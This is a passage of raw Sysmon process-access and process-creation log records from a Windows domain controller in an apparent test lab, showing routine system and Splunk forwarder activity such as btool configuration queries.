32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-4200-00000000A301}38403844C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.508{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-4100-00000000A301}38283832C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.502{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 